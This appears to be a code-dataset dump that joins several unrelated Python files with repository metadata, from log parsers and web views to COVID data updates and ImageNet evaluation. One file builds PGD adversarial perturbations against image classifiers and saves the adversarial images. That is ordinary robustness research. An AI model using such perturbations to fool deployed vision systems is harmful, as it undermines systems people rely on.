ADDRESS_LCD_WRITE_PARAMETER_2 = 0x4181
ADDRESS_POWER_LEVEL = 0x41f4
ADDRESS_BATTERY_LEVEL = 0x4203
ADDRESS_LEVELMA = 0x420D
ADDRESS_KEY = 0x4213
# EEPROM addresses
EEPROM_ADDRESS_POWER_LEVEL = 0x8009
EEPROM_ADDRESS_FAVORITE_MODE = 0x800C
# Commands
COMMAND_START_FAVORITE_MODULE = 0x00
COMMAND_EXIT_MENU = 0x04
COMMAND_SHOW_MAIN_MENU = 0x0a
COMMAND_NEW_MODE = 0x12
COMMAND_WRITE_STRING_TO_LCD = 0x15
COMMAND_NO_COMMAND = 0xff
# Modes
MODE_POWERON = 0x00
MODE_UNKNOWN = 0x01
MODE_WAVES = 0x76
MODE_STROKE = 0x77
MODE_CLIMB = 0x78
MODE_COMBO = 0x79
MODE_INTENSE = 0x7a
MODE_RYTHM = 0x7b
MODE_AUDIO1 = 0x7c
MODE_AUDIO2 = 0x7d
MODE_AUDIO3 = 0x7e
MODE_SPLIT = 0x7f
MODE_RANDOM1 = 0x80
MODE_RANDOM2 = 0x81
MODE_TOGGLE = 0x82
MODE_ORGASM = 0x83
MODE_TORMENT = 0x84
MODE_PHASE1 = 0x85
MODE_PHASE2 = 0x86
MODE_PHASE3 = 0x87
MODE_USER1 = 0x88
MODE_USER2 = 0x89
MODE_USER3 = 0x8a
MODE_USER4 = 0x8b
MODE_USER5 = 0x8c
MODE_USER6 = 0x8d
MODE_USER7 = 0x8e
# Power Level
POWERLEVEL_LOW = 0x01
POWERLEVEL_NORMAL = 0x02
POWERLEVEL_HIGH = 0x03
# Register 15 Bits
REGISTER_15_ADCDISABLE = 0
# Buttons
BUTTON_MENU = 0x80
BUTTON_OK = 0x20
BUTTON_RIGHT = 0x40
BUTTON_LEFT = 0x10
| 20.302632 | 38 | 0.813999 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 116 | 0.075178 |
d50e3b87908d0499a5a93735ec1c8322d076f909 | 3,359 | py | Python | nerlogparser/grammar/bluegenelog.py | studiawan/nerlogparser | 4dc3d955f735ea5496557ee76378a38b5746e425 | [
"Apache-2.0"
] | 5 | 2018-12-20T00:51:30.000Z | 2022-02-08T17:38:33.000Z | nerlogparser/grammar/bluegenelog.py | studiawan/nerlogparser | 4dc3d955f735ea5496557ee76378a38b5746e425 | [
"Apache-2.0"
] | 1 | 2022-02-16T08:49:51.000Z | 2022-02-17T02:19:01.000Z | nerlogparser/grammar/bluegenelog.py | studiawan/nerlogparser | 4dc3d955f735ea5496557ee76378a38b5746e425 | [
"Apache-2.0"
] | 8 | 2020-03-20T11:10:16.000Z | 2022-01-28T16:46:15.000Z | import os
import csv
from pyparsing import Word, alphas, Combine, nums, Regex, ParseException
from collections import OrderedDict
class BlueGeneLog(object):
def __init__(self, dataset):
self.dataset = dataset
self.bluegenelog_grammar = self.__get_bluegenelog_grammar()
@staticmethod
def __get_bluegenelog_grammar():
"""The definition of BlueGene/L grammar.
The BlueGene/L logs can be downloaded from [Usenix2006a]_ and
this data was used in [Stearley2008]_.
Returns
-------
bluegene_grammar :
Grammar for BlueGene/L supercomputer logs.
References
----------
.. [Usenix2006a] The HPC4 data. URL: https://www.usenix.org/cfdr-data#hpc4
.. [Stearley2008] Stearley, J., & Oliner, A. J. Bad words: Finding faults in Spirit's syslogs.
In 8th IEEE International Symposium on Cluster Computing and the Grid, pp. 765-770.
"""
ints = Word(nums)
sock = Word(alphas + '-' + '_')
number = ints
date = Combine(ints + '.' + ints + '.' + ints)
core1 = Word(alphas + nums + '-' + ':' + '_')
datetime = Combine(ints + '-' + ints + '-' + ints + '-' + ints + '.' + ints + '.' + ints + '.' + ints)
core2 = Word(alphas + nums + '-' + ':' + '_')
source = Word(alphas)
service = Word(alphas)
info_type = Word(alphas)
message = Regex('.*')
# blue gene log grammar
bluegene_grammar = sock + number + date + core1 + datetime + core2 + source + service + info_type + message
return bluegene_grammar
def parse_log(self, log_line):
"""Parse the BlueGene/L logs based on defined grammar.
Parameters
----------
log_line : str
A log line to be parsed
Returns
-------
parsed : dict[str, str]
A parsed BlueGene/L log.
"""
parsed = OrderedDict()
try:
parsed_bluegenelog = self.bluegenelog_grammar.parseString(log_line)
parsed['sock'] = parsed_bluegenelog[0]
parsed['number'] = parsed_bluegenelog[1]
parsed['timestamp'] = parsed_bluegenelog[2]
parsed['core1'] = parsed_bluegenelog[3]
parsed['timestamp_bgl'] = parsed_bluegenelog[4]
parsed['core2'] = parsed_bluegenelog[5]
parsed['source'] = parsed_bluegenelog[6]
parsed['service'] = parsed_bluegenelog[7]
parsed['level'] = parsed_bluegenelog[8]
parsed['message'] = parsed_bluegenelog[9]
except ParseException:
print(log_line)
return parsed
if __name__ == '__main__':
dataset_path = '/home/hudan/Git/prlogparser/datasets/'
filenames = ['bgl2/bgl2']
test_file = '/home/hudan/Git/prlogparser/groundtruth/test-results/bgl-test.csv'
f = open(test_file, 'w', newline='')
writer = csv.writer(f)
bl = BlueGeneLog('')
for filename in filenames:
filename = os.path.join(dataset_path, filename)
with open(filename, 'r') as f:
for line in f:
parsed_line = bl.parse_log(line)
print(parsed_line['timestamp'])
row = list(parsed_line.values())
writer.writerow(row)
f.close()
| 33.929293 | 115 | 0.572492 | 2,578 | 0.76749 | 0 | 0 | 1,351 | 0.402203 | 0 | 0 | 1,208 | 0.359631 |
d50eb66f6a2f65dfb75bacdcb2e90ded759fc355 | 2,106 | py | Python | wagtailcomments/views.py | takeflight/wagtailcomments | 941ae2f16fccb867a33d2ed4c21b8e5e04af712d | [
"BSD-3-Clause"
] | 7 | 2016-09-28T10:51:44.000Z | 2018-09-29T08:27:23.000Z | wagtailcomments/views.py | takeflight/wagtailcomments | 941ae2f16fccb867a33d2ed4c21b8e5e04af712d | [
"BSD-3-Clause"
] | null | null | null | wagtailcomments/views.py | takeflight/wagtailcomments | 941ae2f16fccb867a33d2ed4c21b8e5e04af712d | [
"BSD-3-Clause"
] | 2 | 2017-05-21T08:41:19.000Z | 2018-08-06T13:50:59.000Z | from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from django.http import Http404, HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.template.response import TemplateResponse
from wagtailcomments import registry
from wagtailcomments.models import CommentStatus
from wagtailcomments.utils import get_comment_form_class, get_return_url
def add_comment(request, content_type_pk, object_pk):
content_type = get_object_or_404(ContentType, pk=content_type_pk)
if content_type.model_class() not in registry:
raise Http404
object = get_object_or_404(content_type.model_class(), pk=object_pk)
return_url = get_return_url(request, object)
# Only POSTs allowed, but be nice to people instead of a HTTP 405 error
if request.method != 'POST':
return HttpResponseRedirect(return_url)
# For comment systems that allow replies, etc, there might be multiple
# forms on the page. These forms are disambiguated using a form prefix,
# 'comment_form_prefix' should be included in the post data so we know what
# fields to look for.
form_prefix = request.POST.get('comment_form_prefix')
CommentForm = get_comment_form_class()
form = CommentForm(data=request.POST, files=request.FILES, request=request,
object=object, prefix=form_prefix)
if form.is_valid():
comment = form.save()
if comment.status is CommentStatus.published:
message = 'Your comment has been posted'
else:
# Every other type gets the same 'awaiting moderation' message,
# regardless of whether the comment is awaiting moderation or has
# automatically been marked as deleted
message = 'Your comment has been added, and is awaiting moderation'
messages.success(request, message)
return HttpResponseRedirect(return_url)
return TemplateResponse(request, 'wagtailcomments/add_comment.html', {
'object': object,
'object_type': content_type,
'form': form,
})
| 42.979592 | 79 | 0.727445 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 649 | 0.308167 |
d50f0e9cbb19e05d48c36acf153af68b7038da01 | 2,468 | py | Python | open_mafia_engine/built_in/roleblock.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 9 | 2018-08-19T21:47:00.000Z | 2021-11-30T20:46:09.000Z | open_mafia_engine/built_in/roleblock.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 2 | 2021-05-16T00:12:39.000Z | 2021-05-16T18:36:47.000Z | open_mafia_engine/built_in/roleblock.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 2 | 2020-11-28T06:13:10.000Z | 2021-05-16T22:23:22.000Z | from typing import List, Optional
from open_mafia_engine.core.all import (
Ability,
Action,
Actor,
ATBase,
CancelAction,
EPreAction,
Game,
GameObject,
handler,
)
from .auxiliary import TempPhaseAux
class RoleBlockerAux(TempPhaseAux):
"""Aux object that blocks actions made by the target.
It removes itself after the end of the phase.
Attributes
----------
game : Game
target : Actor
The target to block.
key : None or str
Safely ignore this (?).
only_abilities : bool
If True, only blocks Ability activations, and lets Triggers through.
Default is True.
"""
def __init__(
self,
game: Game,
/,
target: Actor,
key: str = None,
*,
only_abilities: bool = True,
use_default_constraints: bool = True,
):
self._only_abilities = bool(only_abilities)
self._target = target
super().__init__(
game, key=None, use_default_constraints=use_default_constraints
)
@property
def target(self) -> Actor:
return self._target
@property
def only_abilities(self) -> bool:
return self._only_abilities
@handler
def handle_to_cancel(self, event: EPreAction) -> Optional[List[CancelAction]]:
"""Cancels the action if it came from the target."""
if isinstance(event, EPreAction):
src = event.action.source
if isinstance(src, ATBase):
if self.only_abilities and not isinstance(src, Ability):
# Skip
return
if src.owner == self.target:
return [CancelAction(self.game, self, target=event.action)]
class RoleBlockAction(Action):
"""Action that prevents the target from actioning until the end of the phase."""
def __init__(
self,
game: Game,
source: GameObject,
/,
target: Actor,
*,
priority: float = 90,
canceled: bool = False,
):
self.target = target
super().__init__(game, source, priority=priority, canceled=canceled)
def doit(self):
RoleBlockerAux(self.game, target=self.target, only_abilities=True)
RoleBlockAbility = Ability.generate(
RoleBlockAction,
params=["target"],
name="RoleBlockAbility",
doc="Ability to block others.",
desc="Roleblocks the target.",
)
| 24.929293 | 84 | 0.598865 | 2,041 | 0.826985 | 0 | 0 | 675 | 0.273501 | 0 | 0 | 603 | 0.244327 |
d5136a0af274a53470c429bc113f5296b87d7800 | 6,836 | py | Python | covid_data/daily_updates/update_outbreak.py | gunnarsundberg/covid-tracker | 012f48f4fbeeff6123456196349a4122f927416a | [
"MIT"
] | null | null | null | covid_data/daily_updates/update_outbreak.py | gunnarsundberg/covid-tracker | 012f48f4fbeeff6123456196349a4122f927416a | [
"MIT"
] | 5 | 2021-03-30T14:37:56.000Z | 2021-10-11T17:33:20.000Z | covid_data/daily_updates/update_outbreak.py | gunnarsundberg/covid-tracker | 012f48f4fbeeff6123456196349a4122f927416a | [
"MIT"
] | null | null | null | import os
import io
import math
import requests
from datetime import datetime, date, timedelta
import pandas as pd
from covid_data.models import State, County, Outbreak, OutbreakCumulative
from covid_data.utilities import get_datetime_from_str, api_request_from_str
# Some functions only work for specific region types (state, county etc) because the data sources used differ
"""
# Gets all state outbreak data and returns it as json object
def get_outbreak_data_by_state(outbreak_state):
outbreak_str = "https://covidtracking.com/api/states/daily?state=" + outbreak_state.code
print(outbreak_str)
return api_request_from_str(outbreak_str)
# Gets all outbreak data for a specific state on a specified date and returns it as a json object
def get_outbreak_data_by_state_and_date(outbreak_state, outbreak_date):
outbreak_str = "https://covidtracking.com/api/states/daily?state=" + outbreak_state.code + "&date=" + str(outbreak_date).replace("-","")
return api_request_from_str(outbreak_str)
"""
def update_state_outbreak():
state_outbreak_csv_url = "https://raw.githubusercontent.com/COVID19Tracking/covid-tracking-data/master/data/states_daily_4pm_et.csv"
state_outbreak_csv = requests.get(state_outbreak_csv_url).content
outbreak_data = pd.read_csv(io.StringIO(state_outbreak_csv.decode('utf-8')))
for index, row in outbreak_data.iterrows():
# If state is not a region we track, move to next iteration
try:
record_state = State.objects.get(code=row['state'])
except:
continue
record_date = get_datetime_from_str(str(row['date']))
# If cases are greater than 99, update or create outbreak record
if row['positive'] > 99:
daily_cases = row['positiveIncrease']
daily_total_tested = row['totalTestResultsIncrease']
daily_deaths = row['deathIncrease']
if not math.isnan(row['negativeIncrease']):
daily_negative_tests = row['negativeIncrease']
else:
daily_negative_tests = None
if not math.isnan(row['hospitalizedIncrease']):
daily_admitted_to_hospital = row['hospitalizedIncrease']
else:
daily_admitted_to_hospital = None
if not math.isnan(row['hospitalizedCurrently']):
daily_hospitalized = row['hospitalizedCurrently']
else:
daily_hospitalized = None
if not math.isnan(row['inIcuCurrently']):
daily_in_icu = row['inIcuCurrently']
else:
daily_in_icu = None
new_values = {'region': record_state, 'date': record_date, 'cases': daily_cases, 'negative_tests': daily_negative_tests, 'total_tested': daily_total_tested, 'deaths': daily_deaths, 'admitted_to_hospital': daily_admitted_to_hospital, 'hospitalized': daily_hospitalized, 'in_icu': daily_in_icu}
state_outbreak, created = Outbreak.objects.update_or_create(region=record_state, date=record_date, defaults=new_values)
state_outbreak.save()
cumulative_cases = row['positive']
cumulative_total_tested = row['totalTestResults']
if not math.isnan(row['negative']):
cumulative_negative_tests = row['negative']
else:
cumulative_negative_tests = None
if not math.isnan(row['death']):
cumulative_deaths = row['death']
else:
cumulative_deaths = None
if not math.isnan(row['hospitalizedCumulative']):
cumulative_hospitalized = row['hospitalizedCumulative']
else:
cumulative_hospitalized = None
if not math.isnan(row['inIcuCumulative']):
cumulative_in_icu = row['inIcuCumulative']
else:
cumulative_in_icu = None
state_outbreak_cumulative, created = OutbreakCumulative.objects.update_or_create(
region=record_state,
date=record_date,
defaults={
'cases': cumulative_cases,
'negative_tests': cumulative_negative_tests,
'total_tested': cumulative_total_tested,
'deaths': cumulative_deaths,
'hospitalized': cumulative_hospitalized,
'in_icu': cumulative_in_icu
}
)
state_outbreak_cumulative.save()
def update_all_state_outbreaks(date_to_update):
states = State.objects.all()
for state in states:
outbreak_json = get_outbreak_data_by_state_and_date(state, date_to_update)
update_state_outbreak(outbreak_json)
def update_county_outbreak():
url = "https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv"
county_data = requests.get(url).content
county_data_dataframe = pd.read_csv(io.StringIO(county_data.decode('utf-8')), dtype={'fips': 'object'})
for index, row in county_data_dataframe.iterrows():
cases = row['cases']
if cases > 24:
record_date = datetime.strptime(row['date'], '%Y-%m-%d').date()
county_fips = str(row['fips'])
deaths = row['deaths']
try:
county = County.objects.get(fips_code=county_fips)
outbreak_cumulative_record, created = OutbreakCumulative.objects.update_or_create(
region=county,
date=record_date,
defaults={
'cases': cases,
'deaths': deaths
}
)
outbreak_cumulative_record.save()
except:
continue
try:
county = County.objects.get(fips_code=county_fips)
day_before = record_date - timedelta(days=1)
day_before_df = county_data_dataframe[(county_data_dataframe.fips == county_fips) & (county_data_dataframe.date == str(day_before))]
index = day_before_df.index[0]
cases = cases - day_before_df['cases'][index]
if cases < 0:
cases = 0
deaths = deaths - day_before_df['deaths'][index]
outbreak_record, created = Outbreak.objects.update_or_create(
region=county,
date=record_date,
defaults={
'cases': cases,
'deaths': deaths
}
)
except:
continue
| 42.459627 | 304 | 0.599912 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,720 | 0.251609 |
d51442e5802a7e7a7d3c8bda504b303ddbb541d1 | 483 | py | Python | books/PythonAutomate/webscrap/using_bs4.py | zeroam/TIL | 43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1 | [
"MIT"
] | null | null | null | books/PythonAutomate/webscrap/using_bs4.py | zeroam/TIL | 43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1 | [
"MIT"
] | null | null | null | books/PythonAutomate/webscrap/using_bs4.py | zeroam/TIL | 43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1 | [
"MIT"
] | null | null | null | import bs4
with open("example.html") as f:
# 텍스트 파일로 부터 BeautifulSoup 객체 생성
soup = bs4.BeautifulSoup(f.read(), "lxml")
print(type(soup)) # <class 'bs4.BeautifulSoup'>
# id가 author인 태그 리스트 조회
elems = soup.select("#author")
print(type(elems)) # <class 'list'>
print(type(elems[0])) # <class 'bs4.element.Tag'>
# 태그를 포함한 문자열 출력
print(str(elems[0]))
# 태그 안의 텍스트만 출력
print(elems[0].getText())
# 태그의 속성값 출력
print(elems[0].attrs)
# 해당 태그의 id값 조회
print(elems[0].get('id'))
| 19.32 | 50 | 0.654244 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 334 | 0.557596 |
d5149d3b5b3f45cac244c29fa5eaa4c2f9bbaeff | 109 | py | Python | __init__.py | dl-fmi/bottleneck | bc8795731d148839b1fd6bf6e510abc7968a669d | [
"BSD-2-Clause"
] | null | null | null | __init__.py | dl-fmi/bottleneck | bc8795731d148839b1fd6bf6e510abc7968a669d | [
"BSD-2-Clause"
] | null | null | null | __init__.py | dl-fmi/bottleneck | bc8795731d148839b1fd6bf6e510abc7968a669d | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 13 11:34:33 2019
@author: manninan
""" | 15.571429 | 35 | 0.614679 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 107 | 0.981651 |
d5155bb3abd235bf78598d767115ae4c2571c009 | 55 | py | Python | pytorchltr/__init__.py | rjagerman/pytorchltr | 625416e1e7d21fb2bbc485914704fc2e55274556 | [
"MIT"
] | 37 | 2020-05-24T13:40:52.000Z | 2022-03-17T09:00:52.000Z | pytorchltr/__init__.py | SuperXiang/pytorchltr | 625416e1e7d21fb2bbc485914704fc2e55274556 | [
"MIT"
] | 22 | 2020-05-25T11:35:38.000Z | 2021-03-20T04:08:07.000Z | pytorchltr/__init__.py | SuperXiang/pytorchltr | 625416e1e7d21fb2bbc485914704fc2e55274556 | [
"MIT"
] | 4 | 2020-10-16T13:14:16.000Z | 2022-01-31T17:18:20.000Z | r"""
.. include::../README.md
:start-line: 1
"""
| 7.857143 | 24 | 0.472727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 54 | 0.981818 |
d51574f35003d93d91b7a70eebae9e1bc40963ce | 8,548 | py | Python | ImageNet/lib/validation.py | mhilmiasyrofi/AT_HE | c63c36a0661d826e58eb355914c6758f85981ff3 | [
"Apache-2.0"
] | 107 | 2020-06-15T09:55:11.000Z | 2020-12-20T11:27:11.000Z | pytorch_ares/third_party/AT_HE/ImageNet/lib/validation.py | haichen-ber/ares | 474d549aa402b4cdd5e3629d23d035c31b60a360 | [
"MIT"
] | 7 | 2020-06-14T03:00:18.000Z | 2020-12-07T07:10:10.000Z | pytorch_ares/third_party/AT_HE/ImageNet/lib/validation.py | haichen-ber/ares | 474d549aa402b4cdd5e3629d23d035c31b60a360 | [
"MIT"
] | 19 | 2020-06-14T08:35:33.000Z | 2020-12-19T13:43:41.000Z | from utils import *
import torch
import sys
import numpy as np
import time
import torchvision
from torch.autograd import Variable
import torchvision.transforms as transforms
import torchvision.datasets as datasets
def validate_pgd(val_loader, model, criterion, K, step, configs, logger, save_image=False, HE=False):
# Mean/Std for normalization
mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
# Initiate the meters
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
eps = configs.ADV.clip_eps
model.eval()
end = time.time()
logger.info(pad_str(' PGD eps: {}, K: {}, step: {} '.format(eps, K, step)))
if HE == True:
is_HE = '_HE'
else:
is_HE = ''
if configs.pretrained:
is_HE = '_pretrained'
for i, (input, target) in enumerate(val_loader):
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
#save original images
if save_image == True and i < 2:
original_images_save = input.clone()
for o in range(input.size(0)):
torchvision.utils.save_image(original_images_save[o, :, :, :], 'saved_images/original_images'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
randn = torch.FloatTensor(input.size()).uniform_(-eps, eps).cuda()
input += randn
input.clamp_(0, 1.0)
orig_input = input.clone()
for _ in range(K):
invar = Variable(input, requires_grad=True)
in1 = invar - mean
in1.div_(std)
output = model(in1)
ascend_loss = criterion(output, target)
ascend_grad = torch.autograd.grad(ascend_loss, invar)[0]
pert = fgsm(ascend_grad, step)
# Apply purturbation
input += pert.data
input = torch.max(orig_input-eps, input)
input = torch.min(orig_input+eps, input)
input.clamp_(0, 1.0)
#save adv images
if save_image == True and i < 2:
adv_images_save = input.clone()
for o in range(input.size(0)):
torchvision.utils.save_image(adv_images_save[o, :, :, :], 'saved_images/adv_images'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
#save scaled perturbation
perturbation = input - orig_input
perturbation.clamp_(-eps,eps)
scaled_perturbation = (perturbation.clone() + eps) / (2 * eps)
scaled_perturbation.clamp_(0, 1.0)
if save_image == True and i < 2:
for o in range(input.size(0)):
torchvision.utils.save_image(scaled_perturbation[o, :, :, :], 'saved_images/scaled_perturbation'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
input.sub_(mean).div_(std)
with torch.no_grad():
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % configs.TRAIN.print_freq == 0:
print('PGD Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1, top5=top5))
sys.stdout.flush()
print(' PGD Final Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def validate(val_loader, model, criterion, configs, logger):
# Mean/Std for normalization
mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
# Initiate the meters
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
with torch.no_grad():
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
# compute output
input = input - mean
input.div_(std)
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % configs.TRAIN.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1, top5=top5))
sys.stdout.flush()
print(' Final Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def validate_ImagetNet_C(val_loader_name, model, criterion, configs, logger):
# Mean/Std for normalization
mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
# switch to evaluate mode
model.eval()
fil_index = ['/1','/2','/3','/4','/5']
avg_return = 0
for f in fil_index:
valdir = os.path.join(configs.data, val_loader_name+f)
print(' File: ', valdir)
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(valdir, transforms.Compose([
transforms.Resize(configs.DATA.img_size),
transforms.CenterCrop(configs.DATA.crop_size),
transforms.ToTensor(),
])),
batch_size=configs.DATA.batch_size, shuffle=False,
num_workers=configs.DATA.workers, pin_memory=True)
# Initiate the meters
top1 = AverageMeter()
end = time.time()
for i, (input, target) in enumerate(val_loader):
with torch.no_grad():
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
# compute output
input = input - mean
input.div_(std)
output = model(input)
# measure accuracy and record loss
prec1,_ = accuracy(output, target, topk=(1,2))
top1.update(prec1[0], input.size(0))
# if i % configs.TRAIN.print_freq == 0:
# print('PGD Test: [{0}/{1}]\t'
# 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
# i, len(val_loader),top1=top1))
# print('Time: ', time.time() - end)
# sys.stdout.flush()
print('Prec: ',top1.avg.cpu().item())
avg_return += top1.avg.cpu().item()
print('Avergae Classification Accuracy is: ', avg_return / 5.)
return
| 37.491228 | 167 | 0.565746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,464 | 0.171268 |
d515e1181cd1a83ccea9dcf3b0c0c3bdba283864 | 2,493 | py | Python | scripts/merge.py | vsui/hypergraph-k-cut | 1134ca254fb709bce62a4506c931362d84a06894 | [
"MIT"
] | 2 | 2021-01-17T07:31:36.000Z | 2021-07-14T08:36:50.000Z | scripts/merge.py | vsui/hypergraph-k-cut | 1134ca254fb709bce62a4506c931362d84a06894 | [
"MIT"
] | null | null | null | scripts/merge.py | vsui/hypergraph-k-cut | 1134ca254fb709bce62a4506c931362d84a06894 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""This is a script for making graphs of constant rank instances with varying rank
Usage:
<script> <src_dir> <dest_dir>
Where <src_dir> is a directory with subfolders
```
constant02
constant04
...
```
And each subfolder has a file `data.csv` with the CXY run in it.
This combines the graphs of differents ranks on the same plot
Outputs a graph in a file named 'output.pdf'
"""
import matplotlib.pyplot as plt
import os
import sqlite3
import sys
def get_series_from_folder2(path):
"""Get list of (size, cxy_time) from a sqlite3 file"""
conn = sqlite3.connect(os.path.join(path, 'data.db'))
c = conn.cursor()
# This assumes that all runs are CXY
c.execute('''
SELECT hypergraphs.size, avg(time_elapsed_ms) AS time FROM
runs JOIN hypergraphs ON hypergraphs.id = runs.hypergraph_id
GROUP BY runs.hypergraph_id
ORDER BY hypergraphs.size
''')
return c.fetchall()
# exit()
def get_series_from_folder(path):
"""Get list of (size, cxy_time) from a folder 'say k=2'"""
return get_series_from_file(os.path.join(path, 'data.csv'))
def get_series_from_file(path):
"""Get list of (size, cxy_time) from a CSV file"""
with open(path) as f:
f.readline() # Discard header line
series = []
for line in f:
line = line.strip()
size = float(line.split(',')[1])
time = float(line.split(',')[3])
series.append((size, time))
return series
def unzip(l):
"""Unzips a list of tuples into a tuple of two lists
e.g. [(1,2), (3, 4)] -> ([1, 3], [2, 4])
"""
xs = [t[0] for t in l]
ys = [t[1] for t in l]
return xs, ys
# plt.title(f'Discovery time of CXY on planted instances with different ranks, {os.path.basename(sys.argv[1])}')
folders = [os.path.join(sys.argv[1], folder) for folder in os.listdir(
sys.argv[1]) if folder.startswith('constant')]
plt.xlabel('Hypergraph size')
plt.ylabel('Discovery time (ms)')
min_x, max_x = None, None
folders.sort(key=lambda name: int(name[-2:]))
print(folders)
for folder in folders:
xs, ys = unzip(get_series_from_folder2(folder))
print(xs, ys)
plt.plot(xs, ys, label=f'rank={int(folder[-2:])}', marker='.')
min_x = xs[0] if min_x is None else max(min_x, xs[0])
max_x = xs[-1] if max_x is None else min(max_x, xs[-1])
plt.xlim(min_x, max_x)
plt.legend()
plt.savefig(os.path.join(sys.argv[2]))
plt.close()
| 24.683168 | 112 | 0.638187 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,192 | 0.478139 |
1d0fdb41642d7e059e2af9967d0a5707e8be001c | 1,829 | py | Python | StationeryBG.py | CharlesW1970/Handright | cda9400232e1815f7137ab3bd86ded8e307f35c7 | [
"BSD-3-Clause"
] | 1 | 2020-10-14T06:05:35.000Z | 2020-10-14T06:05:35.000Z | StationeryBG.py | CharlesW1970/Handright | cda9400232e1815f7137ab3bd86ded8e307f35c7 | [
"BSD-3-Clause"
] | null | null | null | StationeryBG.py | CharlesW1970/Handright | cda9400232e1815f7137ab3bd86ded8e307f35c7 | [
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
from PIL import Image, ImageFont
from handright import Template, handwrite
text = """
这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。
这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。这是一段自动生成的笔迹,这是一段自动生成的笔迹。
